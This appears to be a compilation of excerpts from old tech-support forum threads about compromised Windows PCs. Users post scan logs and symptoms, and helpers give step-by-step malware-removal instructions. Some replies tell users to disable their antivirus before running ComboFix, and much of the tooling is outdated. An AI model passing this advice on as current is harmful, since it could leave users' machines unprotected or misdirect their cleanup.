Please copy and paste the contents of Report.txt in your next reply.

Be sure to re-enable your anti-virus and other security programs before connecting to the Internet.

-- If the computer has been infected with the VirusAlert! malware warning from the clock and the Start Menu icons or drives are not visible, open the SDFix folder, right-click on either the XP_VirusAlert_Repair.inf or W2K VirusAlert_Repair.inf (depending on your version of Windows) and select Install from the Context menu. Then reboot to apply the changes.


Hi there,

I'm trying to help my mum out with her computer. After a visit to her local bank they informed her that someone had got her bank details online and has been ordering video games for themselves from this. I need to ensure that her PC is like Fort Knox, as I'm meant to be good with computers but need help this time. Here's what I've tried so far:

Ran MSE anti-virus, updated and full scan: nothing found.
Ran Malwarebytes anti malware: updated and full scan: nothing found

IE is the latest version but it seems to have adverts all over the place. I've disabled all add-ons but to no avail. Is the best thing to do next to uninstall and reinstall IE?

Thanks for any advice given to me.

Answer: Computer compromised

Run HiJackthis and post the log file as well.

I would also recommend checking to make sure that there are no rootkits; can be done with TDSSKiller by Kaspersky (free tool).

Also, I would shy away from IE if possible. Go with FireFox or Chrome, and install ad-block / flash block extensions. This way, ads are blocked and flash is blocked by default unless you click on the video's frame and click play (good way to block flash-based ads as well).

I would also recommend NoScript for FF, but can be a bit tricky if used by a non-technical person as it will block individual sites requesting access on a single site (i.e. has embedded links / resources and such).


Hello, I am trying to fix a computer running Windows 8. A user had clicked on an email that contained a virus or some malware of some sort. The symptoms of the virus: Bitdefender custom settings are basically disabled and trying to click them on isn't working, as the setting is instantly reset back to not on in "custom settings" -- basically no antivirus ability, can't update in normal mode and can't get an internet connection (tyrannosaurus icon in Google Chrome) in regular user mode.

Here are some of the things I have already attempted to alleviate the problem (roughly in order): I got the computer into safe mode with networking (internet works, but Bitdefender does not). I downloaded Kaspersky TDSSKiller and ran it to no avail. I downloaded and ran MBAM, also to no avail. At another point I attempted a system restore, a point well beyond the infection, the 2nd one. Still didn't work. I then tried Bitdefender's rescue disk that I dl'd and burnt. Its graphics at the start were ok, then it went all messed up with errors and blurry graphics. It just didn't work... perhaps because it's 64-bit Windows, as my 32-bit machine was fine using it. I then got more serious about backing up files and changed settings in the UEFI or the Windows 8 BIOS to run a Linux Mint live CD to recover files. Files were copied to another computer in the event that the most drastic thing has to happen -- formatting/reinstalling/whatever. So the typical legacy, secure boot off, ... Read more

Answer: Bitdefender compromised by email virus - and internet access

Hello...

Please download MiniToolBox, save it to your desktop and run it.
Checkmark the following checkboxes:
- Flush DNS
- Report IE Proxy Settings
- Reset IE Proxy Settings
- Report FF Proxy Settings
- Reset FF Proxy Settings
- List content of Hosts
- List IP configuration
- List Winsock Entries
- List last 10 Event Viewer log
- List Installed Programs
- List Users, Partitions and Memory size

Click Go and post the result (Result.txt). A copy of Result.txt will be saved in the same directory the tool is run.
Note: When using "Reset FF Proxy Settings" option Firefox should be closed.

Download TDSSKiller and save it to your desktop.
Extract (unzip) its contents to your desktop.
Open the TDSSKiller folder and doubleclick on TDSSKiller.exe to run the application, then on Start Scan.
If an infected file is detected, the default action will be Cure, click on Continue.
If a suspicious file is detected, the default action will be Skip, click on Continue.
It may ask you to reboot the computer to complete the process. Click on Reboot Now.
If no reboot is required, click on Report. A log file should appear. Please copy and paste the contents of that file here.
If a reboot is required, the report can also be found in your root directory (usually C:\ folder) in the form of TDSSKiller_xxxx_log.txt. Please copy and paste the contents of that file here.

ADW Cleaner

Please download AdwCleaner by Xplode and save to your Desktop. Double-click on AdwCleaner.exe to run the tool.
Vista/Windows 7/8 users right-click and... Read more


DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.16428  BrowserJavaVersion: 10.45.2
Run by Tyrone at 1:06:25 on 2013-12-11
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.6010.4399 [GMT -8:00]
.
AV: Norton Security Suite *Enabled/Updated* {63DF5164-9100-186D-2187-8DC619EFD8BF}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Norton Security Suite *Enabled/Updated* {D8BEB080-B73A-17E3-1B37-B6B462689202}
FW: Norton Security Suite *Enabled* {5BE4D041-DB6F-1935-0AD8-24F3E73C9FC4}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Program Files\IDT\WDM\STacSV64.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\WLANExt.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Intel\WiFi\bin\EvtEng.exe
C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\IDT\WDM\sttray64.exe
C:\Program Files\Common Files\Intel\Wireless... Read more

Answer: removed virus and restored to factory settings... Still compromised?!

Hello, Welcome to BleepingComputer. I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps.

===

Your DDS log is clean. Any issues with this computer?


Is there any way avast can be compromised while showing it's operating normally, or any other scan engine such as Malwarebytes and SuperAntiSpyware? How would one know if the system is compromised if it operates normally as if it had not been compromised by malware? Would this come up in an OTL log or some other type of utility? If it is compromised, how could it be fixed and how can you find out?
 

Answer: Solved: Compromised Anti Virus & Firewall's 3rd Party etc

Try downloading the eicar test virus, that will verify if your antivirus is still working.

http://www.eicar.org/anti_virus_test_file.htm

Note: since you have several security programs, enable one at a time and do the download. See if each picks up the eicar.

To test your firewall, go to ShieldsUP at grc.com
 


Currently my computer has a number of issues, these started when I downloaded what I thought was a no-cd crack for Diablo 2: Lord of Destruction (I DO own the game, however I cannot find my cd ><). I noticed immediately after unzipping the files that I had a problem, popups everywhere, I couldn't go into my computer without errors showing up (these are fixed as I use spybot and it took care of most of these things, however I still do have popups). I also cannot use ctrl+shift+esc to get to task manager, nor can I use ctrl+alt+del to get to task manager as apparently task manager is "disabled".

Currently if I google anything and click any link that would lead me to where I would search, I go to this link

Mods note:

<URL removed>

Hmm, I can't think of any other problems that I would think originated from infection, however I somehow managed to accidentally uninstall my soundcard driver - if anyone can assist me in finding that I'd much much appreciate it - though I'm mostly concerned with getting my computer virus free. (I don't really know what sound card I have, however this is a link to the exact model of PC I have - the only thing I have upgraded in my PC is my video card which should be a non issue - http://www.dealtime.com/xPF-Gateway-...VDRW-Dual-Laye)

My Log:
Deckard's System Scanner v20071014.68
Run by Owner on 2008-04-08 19:57:04
Computer is in Normal Mode.
--------------------------------------------------------------------... Read more

Answer: Frustrated with compromised computer

Hi and welcome to TSF.

I am currently reviewing your log. Please note that this is under the supervision of an expert analyst, and I will be back with a fix for your problem as soon as possible.

You may wish to subscribe to this thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant Notification, then click Subscribe.

Please be patient with me during this time.


I play World of Warcraft and recently had my account taken control of. I then realised since I have never given out my password, it must be a keylogger.

I ran KL-Detector while I screwed around in notepad and a few other things, and this is what it came up with
Code:
KL-Detector has found some suspicious files:
C:\Users\Taylor\AppData\Local\Temp\~DFF1AC.tmp
C:\Users\Taylor\AppData\Local\Temp\~DFFCBB.tmp
C:\Program Files\World of Warcraft\Logs\SESound.log

Please check; someone might have installed a keylogger on your computer!
You MAY want to take a look at:
C:\Users\Taylor\AppData\Local\Temp\
C:\Program Files\World of Warcraft\Logs\
C:\Users\Taylor\AppData\Roaming\Microsoft\Windows\Cookies\
C:\Windows\Prefetch\
C:\Users\Taylor\AppData\Local\VirtualStore\Program Files\World of Warcraft\Cache\WDB\enUS\

>>FULL REPORT<<

Below are some file operations that were done during the monitoring process.
Review them carefully and check for suspicious files.
C:\Users\Taylor\AppData\Local\Microsoft\Windows\UsrClass.dat
was modified.

C:\Users\Taylor\AppData\Local\Microsoft\Windows\UsrClass.dat
was modified.

C:\Users\Taylor\ntuser.dat.LOG1
was modified.

C:\Users\Taylor\NTUSER.DAT
was modified.

C:\Users\Taylor\NTUSER.DAT
was modified.

C:\Windows\Prefetch\KL-DETECTOR.EXE-BAE45825.pf
was modified.

C:\Windows\Prefetch\KL-DETECTOR.EXE-BAE45825.pf
was modified.

C:\Windows\Prefetch\NOTEPAD.EXE-EB1B961A.pf
was modified.

C:\Windows\Prefetch\NOTEPAD.EXE-EB1B961A.pf
was... Read more

Answer: Computer compromised with a keylogger

Hey guys, if the KL detector doesn't mean much, just ignore it and look at the hijack this post.

Thanks guys!
 


Somehow someone is seeing my passwords on my computer and accessing some of my accounts, specifically my Verizon account and Vanguard so far. I have a flag set up on credit bureaus and have set up security features and alerts in all my accounts. I'm posting Speccy and ToolBox below. Curious if you see anything suspicious or have any recommendations? Thanks
 
 
http://speccy.piriform.com/results/akVa5YbYYOg6ghUMB30gqou
 
 
MiniToolBox by Farbar  Version: 21-07-2014
Ran by zj (administrator) on 07-03-2015 at 16:20:55
Running from "C:\Users\zj\Desktop"
Microsoft Windows 7 Professional  Service Pack 1 (X64)
Boot Mode: Normal
***************************************************************************
 
========================= Event log errors: ===============================
 
Application errors:
==================
Error: (03/07/2015 02:51:02 PM) (Source: WinMgmt) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (03/06/2015 11:32:28 AM) (Source: LMS) (User: NT AUTHORITY)
Description: LMS Service lost connection to HECI driver
 
Error: (03/06/2015 10:46:09 AM) (Source: LMS) (User: NT AUTHORITY)
Description: LMS Service lost connection to HECI driver
 
Error: (03/05/2015 09:24:18 AM) (Source: Application Error) (User: )
Description: Faulting application name: NinjaTrader... Read more

Answer: Computer security compromised..

There is a chance that you are infected with a backdoor, bot or RAT (remote administration tool). If this is the case, more powerful advanced tools will be needed than can be used here in Am I Infected.

Please follow the instructions in ==>This Guide<== starting at Step 6. If you cannot complete a step, skip it and continue.

Once the proper logs are created, then make a NEW TOPIC and post it ==>HERE<== Please include a description of your computer issues, what you have done to resolve them, and a link to this topic.

If you can produce at least some of the logs, then please create the new topic and explain what happens when you try to create the log(s) that you couldn't get. If you cannot produce any of the logs, then still post the topic and explain that you followed the Prep. Guide, were unable to create the logs, and describe what happens when you try to create the logs.

It would be helpful if you post a note here once you have completed the steps in the guide and have started your topic in malware removal. Good luck and be patient.

If HelpBot replies to your topic, PLEASE follow Step One so it will report your topic to the team members.


A friend is fearful that her computer has been compromised. This is the HJT logfile:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:29:07 PM, on 11/1/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16915)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\WINDOWS\System32\svchost.exe
C:\PROGRA~1\AVG\AVG8\avgtray.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\Program Files\AVG\AVG8\avgcsrvx.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\explorer.exe
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
C:\Program Files\Windows Live\Contacts\wlcomm.exe
C:\PROGRA~1\AVG\AVG8\avgnsx.exe
C:\Program Files\Winamp\winamp.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.comcast.net
R3 - URLSearchHook: AVG Security Toolbar BHO - {A3BC75A2-1F87-4686-AA43-5347D756017C} - C:\Program Files\AVG\AVG8\Toolbar\IEToolbar.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D... Read more

Answer: Suspect computer is compromised!

Hello and Welcome to TSF.

We no longer use HijackThis as our initial analysis tool.

We want all our members to perform the steps outlined in the link I'll give you below, before posting for assistance. There's a sticky at the top of this forum, and a "Having problems with spyware and pop-ups? First Steps" link at the top of each page.

---------------------------------------------------------------------------------------------

Please follow our pre-posting process outlined here:

http://www.techsupportforum.com/f50/...lp-305963.html

After running through all the steps, you shall have a proper set of logs. Please post them in a new topic, as this one shall be closed.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

Please note that the Virus/Trojan/Spyware Help forum is extremely busy, and it may take a while to receive a reply.


More detail about why your friend thinks the machine has been compromised will be helpful. What symptoms? Please report them in your new topic.


I have a 2wire router/modem which is usually very sloppy but today I noticed a few warning signs that make me think that somebody accessed or tried to access to my computer through my network.

First, last night I completely charged my Acer laptop and used it for a few minutes. When I woke up, I could hear the computer was trying to start unsuccessfully, but I didn't worry about that since it does that sometimes; I have a cheap laptop. I woke up my computer (I don't shut it down every day) and I could go online right away, but after 5 minutes I was disconnected. I reset my router once but after a few minutes my internet was disconnected again. This time, I manually disconnected my computer from my network and reset the router again. When I came back to my computer, this is what happened:

* My computer was connected to a neighbor's unsecured network.
* Right away, I disconnected from that network and connected to my own secure, hidden network.
* ZoneAlarm prompted me to add and set the new network. Since I didn't know which network that was, I did something stupid. I shut down ZoneAlarm. When I realized that, I started it again.
* I went to my devices and I found a Belkin router--I have a 2wire router. I deleted it.
* I went to ZoneAlarm and found my own network and another network that shouldn't have been there. I deleted all networks.

I don't remember my last configuration but I think it might have changed. This is what I see in Network and Shari... Read more

Answer: Help me figure out if my computer has been compromised

Enable WPA(2)-PSK encryption on the router. Use a strong passphrase--20+ (at least 8 or 9) characters of letters and numbers and special characters mixed (do not use dictionary words).
 


Hi,
 
I have an ongoing problem. For the last five years, the same person or persons keeps breaking into my computer and network. I have had several computers and different ISPs; I have even moved out of state for six months, and even there they kept on attacking me. I came back and still the person keeps getting in. I have bought security software, and I have used the free ones as well, to no avail. Somehow this person is able to listen in to my conversations. Now they are impersonating me online, and make it their business to draw my attention to it. One thing is if they are harassing me and threatening to hurt me, but it is completely another when they are taking to harassing my family, or anyone else that I care about. I have contacted the police; they won't do anything without solid proof. I have sent in complaints to the FBI and other computer crime resources, and heard nothing back from them.
 
This person believes that since they have been getting away with this so long, no one can stop them. I must stop them. I need to get my life back. This person or persons are all into my business, and I do not even know their name. They can attack me whenever they want to, and I cannot identify this person. I need help here. I feel like a victim; I sound like one even to my own ears. I do not wish to be one. I won't be one. Can you help me with my problem? If you could I would most certainly thank you.

Answer: Computer and cellphone compromised

Tonight I downloaded the tcp utility to see what is going on on the network. Every time I try to run the program it starts to run, then it shuts down. I have tried several times, and still the same result. What I did notice for the short time that the program was running was that there were many processes running. I noticed other things as well. I just tried again, and many of the processes running before are all closed down. I see now that there are just very few running, not the case five minutes ago.
 
Also I was having issues accessing a site I use usually with no issues. I believe that it was a denial of service attack. This went on for about three hours.
 
I was hoping that by now someone would get around to helping me with this problem. I am aware that there are many people on this site, and they too need help. I am going to continue to ask for help, and state what is going on, until I am helped. I would prefer to receive help from someone who actually works for the site. I am not being fussy or thinking that I am more entitled than anyone else. The person who has been attacking me has just recently tried to communicate with me. I must be sure who I am speaking to, and who is assisting me with this situation. Thank you.


Help.... Please...

I think that I have a few problems going on that are a result of an infestation of a virus or other malicious software. I am running IIS on a Windows 2000 Server. Since last week we cannot send email. I even tried to drop a few messages into the pickup directory and it immediately goes to the bad mail folder. So far, I have found the following.

1. net32a.exe

2. spybot.exe

Also, when trying to send mail I receive a message that looks like the following:

"Unable to deliver this message because the follow error was encountered: "Error is processing file in pickup directory.". The specific error code was 0xC00402CE.
The wording is broken in some places ("follow" instead of following / Error "is" instead of Error "in") which leads me to believe I may have been compromised by someone. I'm not sure what to do... I need help.
Thank you.
 

Answer: Solved: Computer Compromised? Help...


This is going to be a long one, sorry. Let me start by saying that I am a professional in the field (web systems engineer) so have a pretty good working knowledge of systems and networks.
 
I recently (6/28/16) received an email from my ISP (Cox) stating that they detected a ZBot infection from my network, due to access of a known C&C server. I inspected the email headers to ensure that the email did in fact come from Cox and it appears to be legitimate.
 
I can post the URL that they said my network had contacted, but was not sure if I should do that in this forum or not, given the stated rules. Since my systems are behind a router locally Cox was (obviously) not able to tell which system on my side this traffic came from, but I only have one personal Windows system running at the moment. There are also a few Android devices, a smart TV, and Xbox One.
 
We use OpenDNS (free version) for our DNS services here, and the OpenDNS server IPs are configured directly on the router. All devices within the network use DHCP and pull the correct IPs for DNS services from the router as expected (FYI -- router is a DLink DIR-655 on the latest firmware). I have confirmed that all of this still appears to be in place and that OpenDNS is recording queries coming through it. I also confirmed that the specific URL that Cox flagged was indeed seen in the OpenDNS logs on 6/28/16. This part seemed a little strange to me -- that Cox was able to determine that this URL was access... Read more

Answer: Compromised Computer Notification from ISP

Here is the same netstat command output following a fresh startup (taken about 5-10 minutes after startup to allow initial communications to settle down).
 
TCP Statistics for IPv4
  Active Opens                        = 381
  Passive Opens                       = 77
  Failed Connection Attempts          = 8
  Reset Connections                   = 101
  Current Connections                 = 8
  Segments Received                   = 22743
  Segments Sent                       = 16818
  Segments Retransmitted              = 475
Active Connections
  Proto  Local Address          Foreign Address        State
  TCP    127.0.0.1:49668... Read more


Seems my computer, as well as a few other computers of people at an office I do work at, have been compromised. There has been access to my Gmail account from China (according to a message to me from Gmail) in the past few days, my Warcraft account has been hacked, and two other people I know at this office have had their Hotmail accounts accessed and used to spam people in their contacts in the last two days.

I did a full scan of all of my computers with Kaspersky Internet Security 2010 (which is always running on them anyway and automatically updates daily) and came up with nothing.

If one of you fine fellows could have a look at my other logs and see if you see anything suspicious, I would much appreciate it. SAS found 6 tracking cookies. I was familiar with where all came from.

Code:
SUPERAntiSpyware Scan Log
http://www.superantispyware.com

Generated 04/24/2010 at 10:40 AM

Application Version : 4.35.1002

Core Rules Database Version : 4846
Trace Rules Database Version: 2658

Scan type       : Quick Scan
Total Scan Time : 01:47:07

Memory items scanned      : 634
Memory threats detected   : 0
Registry items scanned    : 525
Registry threats detected : 0
File items scanned        : 93216
File threats detected     : 6

Adware.Tracking Cookie
C:\Users\Noah\AppData\Roaming\M... Read more

Answer: Computer possibly compromised

Please download ComboFix from BleepingComputer.com
Alternate link: GeeksToGo.com

Rename ComboFix.exe to combo-fix.exe before you save it to your Desktop.

Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. A guide to do this can be found here.

Click Start then copy paste the following command into the search box & hit enter: "%userprofile%\desktop\combo-fix.exe" /stepdel

As part of its process, ComboFix will check to see if the Microsoft Windows Recovery Console is installed. This will not install in Vista. Just continue scanning, and skip the console install.

When finished, it shall produce a log for you. Please include the contents of C:\ComboFix.txt in your next reply.


Logfile of HijackThis v1.99.1
Scan saved at 1:45:09 PM, on 4/03/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Hewlett-Packard\HP Share-to-Web\hpgs2wnd.exe
C:\WINDOWS\system32\RunDll32.exe
C:\WINDOWS\System32\sistray.EXE
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\WINDOWS\system32\rundll32.exe
C:\PROGRA~1\INTERN~2\MEDIAKEY.EXE
C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
C:\Program Files\Winamp\winampa.exe
C:\Program Files\Hewlett-Packard\HP Share-to-Web\hpgs2wnf.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpobnz08.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hposol08.exe
C:\Program Files\DLink\Bluetooth Software\bin\btwdins.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\System32\inetsrv\inetinfo.exe
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\WINDOWS\System32\tcpsvcs.exe
C:\PROGRA~1\INTERN~2\KBOSDCtl.EXE
C:\PROGRA~1\INTERN~2\KCodeMsg.EXE
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\ZoneLabs\vsmon.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpoevm08.exe
C:\Program Files\Common File... Read more

Answer: Another HijackThis log from another compromised computer :(

13 more replies

My friend was browsing through the internet on firefox and inadvertently downloaded a malicious program by visiting a website link posted on a forum. I know that my computer is infected as I have had multiple passwords changed on me such as my email password and my friend's game account has also had a password change. I have scanned with AVG and spybot search and destroy. Nothing has worked thus far. I would try to do something with hijack this, but I made an error due to my stupidity last time I tried to delete something scanned by it and ended up having to re-format my system. Here is the log that I have from a recent scan. Any help is greatly appreciated.

Logfile of HijackThis v1.99.1
Scan saved at 6:36:45 PM, on 9/7/2008
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16705)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\brsvc01a.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\brss01a.exe
C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\PROGRA~1\AVG\AVG8\avgfws8.exe
C:\WINDOWS\system32\Brmfrmps.exe
C:\WINDOWS\s... Read more

More replies

The first time I noticed this I got a window saying "This machine dangerously low on resources!" I read where Win98se users should correct this by rebooting and clearing the cache, that this is a flaw in 98. I did but the problem persists, especially if I have Word and a couple of other applications running at once.
Task monitor shows that Explorer is continuously running in the background, even though I use Firefox for browsing. Attempts to close Explorer result in a scrambled desktop and that 'Restore Active Desktop' message, or everything simply hangs until I power off and reboot. I run 98se on a Compaq Deskpro with Pentium 3 that is part of a home network with 2 other computers running Windows XP. They seem to be fine.
Here is a Hijack This! log I just ran which is pretty short.

Logfile of HijackThis v1.99.1
Scan saved at 8:16:08 AM, on 6/11/06
Platform: Windows 98 SE (Win9x 4.10.2222A)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\SYSTEM\MSTASK.EXE
C:\WINDOWS\SYSTEM\MDM.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\TASKMON.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\PROGRAM FILES\CA\ETRUST EZ ARMOR\ETRUST EZ FIREWALL\CA.EXE
C:\PROGRAM FILES\ANALOG DEVICES\SOUNDMAX\SMTRAY.EXE
C:\WINDOWS\SYSTEM\ZONELABS\VSMON.EXE
C:\WINDOWS\SYSTEM\WMIEXE.EXE
C:\WINDOWS\SYSTEM\DDHELP.EXE
C:\WINDOWS\SYSTEM\SPOOL32.EXE
C:\PROGRAM FIL... Read more

More replies

My wow account has been recently hacked 2 times in a row by a keylogger. I was told that posting my HJT logfile as well as my MBAM logfile should be useful for someone specialized in 'malware detecting and cleaning' to see what is really happening in my PC and finally fix it. Please take a look at my logfiles below:

Here's the HijackThis logfile:


Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 4:34:27 μμ, on 14/9/2009
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\Microsoft IntelliType Pro\itype.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\COMODO\COMODO Internet Security\cfp.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\system32\OSK.exe
C:\WINDOWS\system32\MSSWCHX.EXE
C:\Program Files\A... Read more

Answer: Computer compromised with keylogger. Please help!

Hello and Welcome to TSF.

We no longer use HijackThis as our initial analysis tool.

We want all our members to perform the steps outlined in the link I'll give you below, before posting for assistance. There's a sticky at the top of this forum, and a "Having problems with spyware and pop-ups? First Steps" link at the top of each page.

---------------------------------------------------------------------------------------------

Please follow our pre-posting process outlined here:

http://www.techsupportforum.com/f50/...lp-305963.html

After running through all the steps, you shall have a proper set of logs. Please post them in a new topic, as this one shall be closed.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

Please note that the Virus/Trojan/Spyware Help forum is extremely busy, and it may take a while to receive a reply.

1 more replies

I was on my computer tonight when my computer froze and I had to restart. I'm on a wireless connection run by my apartment building, and I have some personal security stuff on here but really am not too sure about the wireless security my building runs. I don't really download that much off of the internet, so I was surprised when strange things happened when I restarted my computer tonight. First, there was a brand new internet connection listed under my connections tab called Internet (1) that was not there before using WAN miniport. Also, the bar on the bottom of my screen is becoming distorted at times for no reason. And as I just now look, part of my screen is becoming cut off, with a strip of nothing but black along the right hand side of the screen. The time was changed to military time which I didn't do, and I can't change it back for some reason. I'm going to post my HJT log, and I also have RKR, ComboFix, and GMER on my computer as well. If anyone can help me, I'd greatly appreciate it, thanks!

Here's the HJT log:

Logfile of HijackThis v1.99.1
Scan saved at 00:18, on 07-01-10
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.5730.0011)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\acs.exe
C... Read more

Answer: I think my computer security has been compromised?

If someone can please help me I would greatly appreciate it....thanks!
 

2 more replies

Hey guys,
 
I'm a little out of my depth here so don't feel bad about telling me I'm a complete idiot.  I got to work this morning unable to connect to my network drives because "The system detected a possible attempt to compromise security." So I did a little digging through event viewer and found a few disconcerting entries:
 
At 6:14 AM this morning: The Terminal Server security layer detected an error in the protocol stream and has disconnected the client. Client IP: 69.49.130.122.
 
According to Google this generally happens when there's high traffic to the server, but the server doesn't get high traffic ever and the office doesn't even open until 7.
 
Also there's an audit at 12:45AM: 
 
A logon was attempted using explicit credentials.

Subject:
Security ID: SYSTEM
Account Name: WORKSTATION-17$
Account Domain: <REDACTED>
Logon ID: 0x3e7
Logon GUID: {00000000-0000-0000-0000-000000000000}
Account Whose Credentials Were Used:
Account Name: WORKSTATION-17$
Account Domain: <REDACTED>
Logon GUID: {b8e5e60f-7cd0-e25e-5654-baf839662d0d}
Target Server:
Target Server Name: workstation-17$
Additional Information: workstation-17$
Process Information:
Process ID: 0xce0
Process Name: C:\Windows\System32\taskhost.exe
Network Information:
Network Address: -
Port: -
This event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occu... Read more

Answer: My computer's security may have been compromised.

Open the Start Menu and type cmd in the Search programs and features box.  Command will appear above the search box in the results; right click it and select Run as administrator.  This will open the Command Prompt.
 
When the Command Prompt opens copy the command below and paste it in the command prompt, then press Enter.
 
netsh int tcp set global chimney=disabled

2 more replies

Hi, I just got an email from my ISP saying that my computer is infected.
 
Here is the actual quote from the email (only part of it, the rest of the email was just them recommending scanners to use)
 
"Dear Subscriber, ISP has identified that one or more computers/devices behind your cable modem may be infected with the FakeSecSen or "Spy Sheriff" Virus. A device behind your cable modem appears to have connected to a command and control server affiliated with this malware."
 
I have 
 
- Windows 10 Home edition
- 64 bit
- Bitdefender Antivirus Plus 2018
 
